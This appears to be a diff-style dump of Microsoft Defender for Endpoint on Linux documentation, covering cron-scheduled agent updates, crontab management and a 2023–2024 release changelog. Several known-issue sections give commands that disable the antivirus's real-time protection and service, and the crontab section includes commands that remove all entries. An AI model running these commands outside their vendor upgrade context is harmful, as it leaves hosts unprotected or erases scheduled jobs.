-See [Schedule scans with Microsoft Defender for Endpoint (Linux)](linux-schedule-scan-mde.md)
-
-Press "Insert"
-
-Add the following entries:
-
-```bash
-CRON_TZ=America/Los_Angeles
-```
-
-> #!RHEL and variants (CentOS and Oracle Linux)
->
-> ```bash
-> 0 6 * * sun [ $(date +%d) -le 15 ] && sudo yum update mdatp -y >> ~/mdatp_cron_job.log
-> ```
-
-> #!SLES and variants
->
-> ```bash
-> 0 6 * * sun [ $(date +%d) -le 15 ] && sudo zypper update mdatp >> ~/mdatp_cron_job.log
-> ```
-
-> #!Ubuntu and Debian systems
->
-> ```bash
-> 0 6 * * sun [ $(date +%d) -le 15 ] && sudo apt-get install --only-upgrade mdatp >> ~/mdatp_cron_job.log
-> ```
-
-> [!NOTE]
-> In the examples above, we are setting it to 00 minutes, 6 a.m.(hour in 24 hour format), any day of the month, any month, on Sundays.[$(date +\%d) -le 15] == Won't run unless it's equal or less than the 15th day (3rd week). Meaning it will run every 3rd Sundays(7) of the month at 6:00 a.m. Pacific (UTC -8).
-
-Press "Esc"
-
-Type "`:wq`" w/o the double quotes.
-
-> [!NOTE]
-> w == write, q == quit
-
-To view your cron jobs, type `sudo crontab -l`
--
-To inspect cron job runs:
-
-```bash
-sudo grep mdatp /var/log/cron
-```
-
-To inspect the mdatp_cron_job.log
-
-```bash
-sudo nano mdatp_cron_job.log
-```
-
-## For those who use Ansible, Chef, or Puppet
-
-Use the following commands:
-
-### To set cron jobs in Ansible
-
-```bash
-cron - Manage cron.d and crontab entries
-```
-
-See <https://docs.ansible.com/ansible/latest> for more information.
-
-### To set crontabs in Chef
-
-```bash
-cron resource
-```
-
-See <https://docs.chef.io/resources/cron/> for more information.
-
-### To set cron jobs in Puppet
-
-Resource Type: cron
-
-See <https://puppet.com/docs/puppet/5.5/types/cron.html> for more information.
-
-Automating with Puppet: Cron jobs and scheduled tasks
-
-See <https://puppet.com/blog/automating-puppet-cron-jobs-and-scheduled-tasks/> for more information.
-
-## Additional information
-
-### To get help with crontab
-
-```bash
-man crontab
-```
-
-### To get a list of crontab file of the current user
-
-```bash
-crontab -l
-```
-
-### To get a list of crontab file of another user
-
-```bash
-crontab -u username -l
-```
-
-### To back up crontab entries
-
-```bash
-crontab -l > /var/tmp/cron_backup.dat
-```
-
-> [!TIP]
-> Do this before you edit or remove.
-
-### To restore crontab entries
-
-```bash
-crontab /var/tmp/cron_backup.dat
-```
-
-### To edit the crontab and add a new job as a root user
-
-```bash
-sudo crontab -e
-```
-
-### To edit the crontab and add a new job
-
-```bash
-crontab -e
-```
-
-### To edit other user's crontab entries
-
-```bash
-crontab -u username -e
-```
-
-### To remove all crontab entries
-
-```bash
-crontab -r
-```
-
-### To remove other user's crontab entries
-
-```bash
-crontab -u username -r
-```
-
-### Explanation
-
-<pre>
-+ΓÇöΓÇöΓÇöΓÇöΓÇö- minute (values: 0 - 59) (special characters: , - * /) <br>
-| +ΓÇöΓÇöΓÇöΓÇö- hour (values: 0 - 23) (special characters: , - * /) <br>
-| | +ΓÇöΓÇöΓÇö- day of month (values: 1 - 31) (special characters: , - * / L W C) <br>
-| | | +ΓÇöΓÇö- month (values: 1 - 12) (special characters: ,- * / ) <br>
-| | | | +ΓÇö- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , - * / L W C) <br>
-| | | | |*****command to be executed
-</pre>
security Linux Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-updates.md
- Title: Deploy updates for Microsoft Defender for Endpoint on Linux
-description: Describes how to deploy updates for Microsoft Defender for Endpoint on Linux in enterprise environments.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 09/25/2023--
-# Deploy updates for Microsoft Defender for Endpoint on Linux
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-Microsoft regularly publishes software updates to improve performance, security, and to deliver new features.
-
-> [!WARNING]
-> Each version of Defender for Endpoint on Linux is set to expire automatically after 9 months. While expired versions continue to receive security intelligence updates, install the latest version to get all available fixes and enhancements. <br>
->To check the expiration date, run the following command:
-> ```bash
-> mdatp health --field product_expiration
-> ```
--
-Generally available Microsoft Defender for Endpoint capabilities are equivalent regardless update channel used for a deployment (Beta (Insider), Preview (External), Current (Production)).
--
-To update Defender for Endpoint on Linux manually, execute one of the following commands:
-
-## RHEL and variants (CentOS and Oracle Linux)
-
-```bash
-sudo yum update mdatp
-```
-
-## SLES and variants
-
-```bash
-sudo zypper update mdatp
-```
-
-## Ubuntu and Debian systems
-
-```bash
-sudo apt-get install --only-upgrade mdatp
-```
-
-> [!IMPORTANT]
-> When Defender for Cloud is provisioning the Microsoft Defender for Endpoint agent to Linux servers, it will keep the client updated automatically.
-
-To schedule an update of Microsoft Defender for Endpoint on Linux, see [Schedule an update of the Microsoft Defender for Endpoint (Linux)](linux-update-mde-linux.md)
security Linux Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-whatsnew.md
- Title: What's new in Microsoft Defender for Endpoint on Linux
-description: List of major changes for Microsoft Defender for Endpoint on Linux.
---- Previously updated : 03/28/2024---- m365-security-- tier3-- mde-linux----
-# What's new in Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article is updated frequently to let you know what's new in the latest releases of Microsoft Defender for Endpoint on Linux.
--- [What's new in Defender for Endpoint on macOS](mac-whatsnew.md)-- [What's new in Defender for Endpoint on iOS](ios-whatsnew.md)-
-<details>
-<summary> March-2024 (Build: 101.24022.0001 | Release version: 30.124022.0001.0)</summary>
-
-## March-2024 Build: 101.24022.0001 | Release version: 30.124022.0001.0
-
-&ensp;Released: **March 22,2024**<br/>
-&ensp;Published: **March 22,2024**<br/>
-&ensp;Build: **101.24022.0001**<br/>
-&ensp;Release version: **30.124022.0001.0**<br/>
-&ensp;Engine version: **1.1.23110.4**<br/>
-&ensp;Signature version: **1.403.87.0**<br/>
-
-**What's new**
-
-There are multiple fixes and new changes in this release:
--- The addition of a new log file - `microsoft_defender_scan_skip.log`. This will log the filenames that were skipped from various antivirus scans by Microsoft Defender for Endpoint due to any reason.-- Stability and performance improvements.-- Bug fixes.-
-</details>
--
-<details>
-<summary> March-2024 (Build: 101.24012.0001 | Release version: 30.124012.0001.0)</summary>
-
-## March-2024 Build: 101.24012.0001 | Release version: 30.124012.0001.0
-
-&ensp;Released: **March 12,2024**<br/>
-&ensp;Published: **March 12,2024**<br/>
-&ensp;Build: **101.24012.0001**<br/>
-&ensp;Release version: **30.124012.0001.0**<br/>
-&ensp;Engine version: **1.1.23110.4**<br/>
-&ensp;Signature version: **1.403.87.0**<br/>
-
-**What's new**
-There are multiple fixes and new changes in this release:
--- Updated default engine version to `1.1.23110.4`, and default signatures version to `1.403.87.0`.-- Stability and performance improvements.-- Bug fixes.
-</details>
-
-<details>
-
-<summary> February-2024 (Build: 101.23122.0002 | Release version: 30.123122.0002.0)</summary>
-
-## February-2024 Build: 101.23122.0002 | Release version: 30.123122.0002.0
-
-&ensp;Released: **February 5,2024**<br/>
-&ensp;Published: **February 5,2024**<br/>
-&ensp;Build: **101.23122.0002**<br/>
-&ensp;Release version: **30.123122.0002.0**<br/>
-&ensp;Engine version: **1.1.23100.2010**<br/>
-&ensp;Signature version: **1.399.1389.0**<br/>
-
-**What's new**
-There are multiple fixes and new changes in this release:
--- Updated default engine version to `1.1.23100.2010`, and default signatures version to `1.399.1389.0`.-- General stability and performance improvements.-- Bug fixes.-- Microsoft Defender for Endpoint on Linux now officially supports the following distros and versions:-
- | Distro & version | Ring | Package |
- ||||
- | Mariner 2 | Production | https://packages.microsoft.com/cbl-mariner/2.0/prod/extras/x86_64/config.repo |
- | Rocky 8.7 and higher | Insiders Slow | https://packages.microsoft.com/config/rocky/8/insiders-slow.repo |
- | Rocky 9.2 and higher | Insiders Slow | https://packages.microsoft.com/config/rocky/9/insiders-slow.repo |
- | Alma 8.4 and higher | Insiders Slow | https://packages.microsoft.com/config/alma/8/insiders-slow.repo |
- | Alma 9.2 and higher | Insiders Slow | https://packages.microsoft.com/config/alma/9/insiders-slow.repo |
-
-If you already have Defender for Endpoint running on any of these distros and facing any issues in the older versions, please upgrade to the latest Defender for Endpoint version from the corresponding ring mentioned above. Refer our [public deployment docs](comprehensive-guidance-on-linux-deployment.md) for more details.
-
-> [!NOTE]
-> Known issues:
->
-> Microsoft Defender for Endpoint for Linux on Rocky and Alma currently has the following known issues:
-> - Live Response and Threat Vulnerability Management are currently not supported (work in progress).
-> - Operating system info for devices is not visible in the Microsoft Defender portal
-
-</details>
-
-<details>
-<summary> January-2024 (Build: 101.23112.0009 | Release version: 30.123112.0009.0)</summary>
-
-## January-2024 Build: 101.23112.0009 | Release version: 30.123112.0009.0
-
-&ensp;Released: **January 29,2024**<br/>
-&ensp;Published: **January 29, 2024**<br/>
-&ensp;Build: **101.23112.0009**<br/>
-&ensp;Release version: **30.123112.0009.0**<br/>
-&ensp;Engine version: **1.1.23100.2010**<br/>
-&ensp;Signature version: **1.399.1389.0**<br/>
-
-**What's new**
-- Updated default engine version to `1.1.23110.4`, and default signatures version to `1.403.1579.0`.-- General stability and performance improvements.-- Bug fix for behavior monitoring configuration.-- Bug fixes.-
-</details>
-
-<details>
- <summary> November-2023 (Build: 101.23102.0003 | Release version: 30.123102.0003.0)</summary>
-
-## November-2023 Build: 101.23102.0003 | Release version: 30.123102.0003.0
-
-&ensp;Released: **November 28,2023**<br/>
-&ensp;Published: **November 28,2023**<br/>
-&ensp;Build: **101.23102.0003**<br/>
-&ensp;Release version: **30.123102.0003.0**<br/>
-&ensp;Engine version: **1.1.23090.2008**<br/>
-&ensp;Signature version: **1.399.690.0**<br/>
-
-**What's new**
-- Updated default engine version to `1.1.23090.2008`, and default signatures version to `1.399.690.0`.-- Updated libcurl library to version `8.4.0` to fix recently disclosed vulnerabilities with the older version.-- Updated Openssl library to version `3.1.1` to fix recently disclosed vulnerabilities with the older version.-- General stability and performance improvements.-- Bug fixes.-
-</details>
-
-<details>
- <summary> November-2023 (Build: 101.23092.0012 | Release version: 30.123092.0012.0)</summary>
-
-## November-2023 Build: 101.23092.0012 | Release version: 30.123092.0012.0
-
-&ensp;Released: **November 14,2023**<br/>
-&ensp;Published: **November 14,2023**<br/>
-&ensp;Build: **101.23092.0012**<br/>
-&ensp;Release version: **30.123092.0012.0**<br/>
-&ensp;Engine version: **1.1.23080.2007**<br/>
-&ensp;Signature version: **1.395.1560.0**<br/>
-
-**What's new**
-
-There are multiple fixes and new changes in this release:
--- Support added to restore threat based on original path using the following command:
-
- ```bash
- sudo mdatp threat quarantine restore threat-path --path [threat-original-path] --destination-path [destination-folder]
-```
-- Starting with this release, Microsoft Defender for Endpoint on Linux will no longer be shipping a solution for RHEL 6.
-
- RHEL 6 'Extended end of life support' is poised to end by June 30, 2024 and customers are advised to plan their RHEL upgrades accordingly aligned with guidance from Red Hat. Customers who need to run Defender for Endpoint on RHEL 6 servers can continue to leverage version 101.23082.0011 (does not expire before June 30, 2024) supported on kernel versions 2.6.32-754.49.1.el6.x86_64 or prior.
- - Engine Update to `1.1.23080.2007` and Signatures Ver: `1.395.1560.0`.
- - Streamlined device connectivity experience is now in public preview mode. [public blog](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-a-streamlined-device-connectivity-experience-for/ba-p/3956236)
- - Performance improvements & bug fixes.
-
-**Known issues**
--- CPU lock-up seen on kernel version 5.15.0-0.30.20 in ebpf mode, see [Use eBPF-based sensor for Microsoft Defender for Endpoint on Linux](linux-support-ebpf.md) for details and Mitigation options.-
-</details>
-
-<details>
- <summary> November-2023 (Build: 101.23082.0011 | Release version: 30.123082.0011.0)</summary>
-
-## November-2023 Build: 101.23082.0011 | Release version: 30.123082.0011.0
-
-&ensp;Released: **November 1,2023**<br/>
-&ensp;Published: **November 1,2023**<br/>
-&ensp;Build: **101.23082.0011**<br/>
-&ensp;Release version: **30.123082.0011.0**<br/>
-&ensp;Engine version: **1.1.23070.1002**<br/>
-&ensp;Signature version: **1.393.1305.0**<br/>
-
-**What's new**
-This new release is build over October 2023 release (`101.23082.0009``) with addition of following changes. There's no change for other customers and upgrading is optional.
-
-Fix for immutable mode of auditd when supplementary subsystem is ebpf: In ebpf mode all mdatp audit rules should be cleaned after switching to ebpf and rebooting. After reboot, mdatp audit rules were not cleaned due to which it was resulting in hang of the server. The fix cleans these rules, user should not see any mdatp rules loaded on reboot
-
-Fix for MDE not starting up on RHEL 6.
-
-**Known issues**
-
-When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. More information about the underlying issue can be found at [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).
-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> October-2023 (Build: 101.23082.0009 | Release version: 30.123082.0009.0)</summary>
-----
-## October-2023 Build: 101.23082.0009 | Release version: 30.123082.0009.0
-
-&ensp;Released: **October 9,2023**<br/>
-&ensp;Published: **October 9,2023**<br/>
-&ensp;Build: **101.23082.0009**<br/>
-&ensp;Release version: **30.123082.0009.0**<br/>
-&ensp;Engine version: **1.1.23070.1002**<br/>
-&ensp;Signature version: **1.393.1305.0**<br/>
-
-**What's new**
-- This new release is build over October 2023 release (`101.23082.0009``) with addition of new CA Certificates. There's no change for other customers and upgrading is optional. -
-**Known issues**
-
-When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. More information about the underlying issue can be found at [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).
-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> October-2023 (Build: 101.23082.0006 | Release version: 30.123082.0006.0)</summary>
-----
-## October-2023 Build: 101.23082.0006 | Release version: 30.123082.0006.0
-
-&ensp;Released: **October 9,2023**<br/>
-&ensp;Published: **October 9,2023**<br/>
-&ensp;Build: **101.23082.0006**<br/>
-&ensp;Release version: **30.123082.0006.0**<br/>
-&ensp;Engine version: **1.1.23070.1002**<br/>
-&ensp;Signature version: **1.393.1305.0**<br/>
-
-**What's new**
-- Feature updates and new changes
- - eBPF sensor is now the default supplementary event provider for endpoints
- - Microsoft Intune tenant attach feature is in public preview (as of mid July)
- - You must add "*.dm.microsoft.com" to firewall exclusions for the feature to work correctly
- - Defender for Endpoint is now available for Debian 12 and Amazon Linux 2023
- - Support to enable Signature verification of updates downloaded
- - Note that you must update the manajed.json as shown below
- ```
- "features":{
- "OfflineDefinitionUpdateVerifySig":"enabled"
- }
- ```
-
- - Prerequisite to enable feature
- - Engine version on the device must be "1.1.23080.007" or above. Check your engine version by using the following command.
- ``` mdatp health --field engine_version ```
- - Option to support monitoring of NFS and FUSE mount points. These are ignored by default.
- The following example shows how to monitor all filesystem while ignoring only NFS:
-
- ```
- "antivirusEngine": {
- "unmonitoredFilesystems": ["nfs"]
- }
- ```
-
- Example to monitor all filesystems including NFS and FUSE:
- ```
- "antivirusEngine": {
- "unmonitoredFilesystems": []
- }
- ```
-
- - Other performance improvements
- - Bug Fixes
-
-**Known issues**
--- When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. More information about the underlying issue can be found at [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> September-2023 (Build: 101.23072.0021 | Release version: 30.123072.0021.0)</summary>
-----
-## September-2023 Build: 101.23072.0021 | Release version: 30.123072.0021.0
-
-&ensp;Released: **September 11,2023**<br/>
-&ensp;Published: **September 11,2023**<br/>
-&ensp;Build: **101.23072.0021**<br/>
-&ensp;Release version: **30.123072.0021.0**<br/>
-&ensp;Engine version: **1.1.20100.7**<br/>
-&ensp;Signature version: **1.385.1648.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - In mde_installer.sh v0.6.3, users can use the `--channel` argument to provide the channel of the configured repository during cleanup. For example, `sudo ./mde_installer --clean --channel prod`
- - The Network Extension can now be reset by administrators using `mdatp network-protection reset`.
- - Other performance improvements
- - Bug Fixes
-
-**Known issues**
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.98.05`. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> July-2023 (Build: 101.23062.0010 | Release version: 30.123062.0010.0)</summary>
-----
-## July-2023 Build: 101.23062.0010 | Release version: 30.123062.0010.0
-
-&ensp;Released: **July 26,2023**<br/>
-&ensp;Published: **July 26,2023**<br/>
-&ensp;Build: **101.23062.0010**<br/>
-&ensp;Release version: **30.123062.0010.0**<br/>
-&ensp;Engine version: **1.1.20100.7**<br/>
-&ensp;Signature version: **1.385.1648.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - If a proxy is set for Defender for Endpoint, then it's visible in the `mdatp health` command output
- - With this release we provided two options in mdatp diagnostic hot-event-sources:
- 1. Files
- 2. Executables
- - Network Protection: Connections that are blocked by Network Protection and have the block overridden by users are now correctly reported to Microsoft Defender XDR
- - Improved logging in Network Protection block and audit events for debugging
-- Other fixes and improvements
- - From this version, enforcementLevel are in passive mode by default giving admins more control over where they want 'RTP on' within their estate
- - This change only applies to fresh MDE deployments, for example, servers where Defender for Endpoint is being deployed for the first time. In update scenarios, servers that have Defender for Endpoint deployed with RTP ON, continue operating with RTP ON even post update to version 101.23062.0010
--- Bug Fixes
- - RPM database corruption issue in Defender Vulnerability Management baseline has been fixed
-- Other performance improvements-
-**Known issues**
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.98.05`. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> July-2023 (Build: 101.23052.0009 | Release version: 30.123052.0009.0)</summary>
-----
-## July-2023 Build: 101.23052.0009 | Release version: 30.123052.0009.0
-
-&ensp;Released: **July 10,2023**<br/>
-&ensp;Published: **July 10,2023**<br/>
-&ensp;Build: **101.23052.0009**<br/>
-&ensp;Release version: **30.123052.0009.0**<br/>
-&ensp;Engine version: **1.1.20100.7**<br/>
-&ensp;Signature version: **1.385.1648.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - The build version schema is updated from this release. While the major version number remains same as 101, the minor version number now has five digits followed by four digit patch number that is, `101.xxxxx.yyy`
- - Improved Network Protection memory consumption under stress
- - Updated the engine version to `1.1.20300.5` and signature version to `1.391.2837.0`.
- - Bug fixes.
-
-**Known issues**
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.98.05`. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> June-2023 (Build: 101.98.89 | Release version: 30.123042.19889.0)</summary>
-----
-## June-2023 Build: 101.98.89 | Release version: 30.123042.19889.0
-
-&ensp;Released: **June 12,2023**<br/>
-&ensp;Published: **June 12, 2023**<br/>
-&ensp;Build: **101.98.89**<br/>
-&ensp;Release version: **30.123042.19889.0**<br/>
-&ensp;Engine version: **1.1.20100.7**<br/>
-&ensp;Signature version: **1.385.1648.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - Improved Network Protection Proxy handling.
- - In Passive mode, Defender for Endpoint no longer scans when Definition update happens.
- - Devices continue to be protected even after Defender for Endpoint agent has expired. We recommend upgrading the Defender for Endpoint Linux agent to the latest available version to receive bug fixes, features and performance improvements.
- - Removed semanage package dependency.
- - Engine Update to `1.1.20100.7` and Signatures Ver: `1.385.1648.0`.
- - Bug fixes.
-
-**Known issues**
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.98.05`. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> May-2023 (Build: 101.98.64 | Release version: 30.123032.19864.0)</summary>
-----
-## May-2023 Build: 101.98.64 | Release version: 30.123032.19864.0
-
-&ensp;Released: **May 3,2023**<br/>
-&ensp;Published: **May 3, 2023**<br/>
-&ensp;Build: **101.98.64**<br/>
-&ensp;Release version: **30.123032.19864.0**<br/>
-&ensp;Engine version: **1.1.20100.6**<br/>
-&ensp;Signature version: **1.385.68.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - Health message improvements to capture details about auditd failures.
- - Improvements to handle augenrules, which was causing installation failure.
- - Periodic memory cleanup in engine process.
- - Fix for memory issue in mdatp audisp plugin.
- - Handled missing plugin directory path during installation.
- - When conflicting application is using blocking fanotify, with default configuration mdatp health shows unhealthy. This is now fixed.
- - Support for ICMP traffic inspection in BM.
- - Engine Update to `1.1.20100.6` and Signatures Ver: `1.385.68.0`.
- - Bug fixes.
-
-**Known issues**
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.98.05`. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Caution: Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> April-2023 (Build: 101.98.58 | Release version: 30.123022.19858.0)</summary>
-----
-## April-2023 Build: 101.98.58 | Release version: 30.123022.19858.0
-
-&ensp;Released: **April 20,2023**<br/>
-&ensp;Published: **April 20, 2023**<br/>
-&ensp;Build: **101.98.58**<br/>
-&ensp;Release version: **30.123022.19858.0**<br/>
-&ensp;Engine version: **1.1.20000.2**<br/>
-&ensp;Signature version: **1.381.3067.0**<br/>
-
-**What's new**
--- There are multiple fixes and new changes in this release
- - Logging and error reporting improvements for auditd.
- - Handle failure in reload of auditd configuration.
- - Handling for empty auditd rule files during MDE install.
- - Engine Update to `1.1.20000.2` and Signatures Ver: `1.381.3067.0`.
- - Addressed a health issue in mdatp that occurs due to selinux denials.
- - Bug fixes.
-
-**Known issues**
--- While upgrading mdatp to version `101.94.13` or later, you might notice that health is false, with health_issues as "no active supplementary event provider". This can happen due to misconfigured/conflicting auditd rules on existing machines. To mitigate the issue, the auditd rules on the existing machines need to be fixed. The following commands can help you to identify such auditd rules (commands need to be run as super user). Take a backup of following file: /etc/audit/rules.d/audit.rules as these steps are only to identify failures.-
-```bash
-echo -c >> /etc/audit/rules.d/audit.rules
-augenrules --load
-```
--- While upgrading from mdatp version `101.75.43` or `101.78.13`, you could encounter a kernel hang. Run the following commands before attempting to upgrade to version `101.98.05`. For more information, see [System hang due to blocked tasks in fanotify code](https://access.redhat.com/solutions/2838901).-
-There are two ways to mitigate this upgrade issue:
-
-1. Use your package manager to uninstall the `101.75.43` or `101.78.13` mdatp version.
-
-Example:
-```bash
-sudo apt purge mdatp
-sudo apt-get install mdatp
-```
-2. As an alternative you can follow the instructions to [uninstall](/microsoft-365/security/defender-endpoint/linux-resources#uninstall), then [install](/microsoft-365/security/defender-endpoint/linux-install-manually#application-installation) the latest version of the package.
-
-If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before upgrading.
-Caution: Some customers (<1%) experience issues with this method.
-
- ```bash
-sudo mdatp config real-time-protection --value=disabled
-sudo systemctl disable mdatp
-```
-</details>
-
-<details>
- <summary> March-2023 (Build: 101.98.30 | Release version: 30.123012.19830.0)</summary>
-----
-## March-2023 Build: 101.98.30 | Release version: 30.123012.19830.0
-
-&ensp;Released: **March , 20,2023**<br/>
-&ensp;Published: **March 20, 2023**<br/>
-&ensp;Build: **101.98.30**<br/>
-&ensp;Release version: **30.123012.19830.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.379.1299.0**<br/>
-**What's new**
-- This new release is build over March 2023 release (`101.98.05``) with a fix for Live response commands failing for one of our customers. There's no change for other customers and upgrade is optional.
-
-**Known issues**
--- With mdatp version 101.98.30 you might see a health false issue in some of the cases, because SELinux rules aren't defined for certain scenarios. The health warning could look something like this:-
-*found SELinux denials within last one day. If the MDATP is recently installed, clear the existing audit logs or wait for a day for this issue to autoresolve. Use command: \"sudo ausearch -i -c 'mdatp_audisp_pl' | grep \"type=AVC\" | grep \" denied\" to find details*
